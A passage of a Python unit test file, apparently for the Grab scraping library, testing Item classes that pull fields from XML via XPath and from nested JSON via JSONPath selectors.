                         [x.name for x in games])

    def test_stringfield_multiple(self):
        grab = build_grab()
        grab.fake_response(XML)

        class GameItem(Item):
            names = StringField('//game/@name', multiple=True)

        game = GameItem(grab.tree)
        self.assertEqual(['quake1', 'quake2'], game.names)

    def test_item_inheritance(self):
        class BaseItem(Item):
            class Meta:
                find_query = '//player'
            name = StringField('firstname')
            age = IntegerField('age')

        class ChildItem(BaseItem):
            name = StringField('lastname')

        grab = build_grab(document_body=XML)
        items = list(BaseItem.find(grab.doc))
        self.assertEqual(items[0].name, 'Ardeshir')
        self.assertEqual(items[0].age, 19)
        self.assertEqual(set(['name', 'age']), set(items[0]._fields.keys()))
        items = list(ChildItem.find(grab.doc))
        self.assertEqual(items[0].age, 19)
        self.assertEqual(set(['name', 'age']), set(items[0]._fields.keys()))
class JsonSelectorTestCase(TestCase):
    """Tests for Item classes driven by JSONPath selectors."""

    class PlanetItem(Item):
        class Meta:
            # JSONPath query matching every planet in every world.
            find_query = '$..planets[*]'
            selector_type = 'json'

        name = StringField('name')

    def setUp(self):
        # Nested fixture: two worlds, three planets in total.
        self.data = {
            'existence': {
                'worldA': {
                    'id': 1,
                    'planets': [
                        {'name': 'Earth', 'cities': ['Moscow', 'Paris', 'Tokio'],
                         'population': 7000000000},
                        {'name': 'Mars', 'cities': [], 'population': 0},
                    ],
                },
                'worldB': {
                    'id': 2,
                    'planets': [
                        {'name': 'Onyx', 'cities': ['Oyyx', 'Yiiix'], 'population': 8000000},
                    ],
                },
            },
        }

    def it_just_works(self):
        # NOTE(review): name lacks the "test_" prefix, so unittest never
        # runs this, and the result is discarded -- presumably an old
        # smoke check; confirm intent.
        item = self.PlanetItem(self.data, selector_type='json')

    def test_find(self):
        planets = list(self.PlanetItem.find(self.data))
        self.assertEqual(len(planets), 3)

    def test_string_field(self):
        planets = list(self.PlanetItem.find(self.data))
        self.assertEqual(set(['Earth', 'Mars', 'Onyx']),
                         set(x.name for x in planets))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.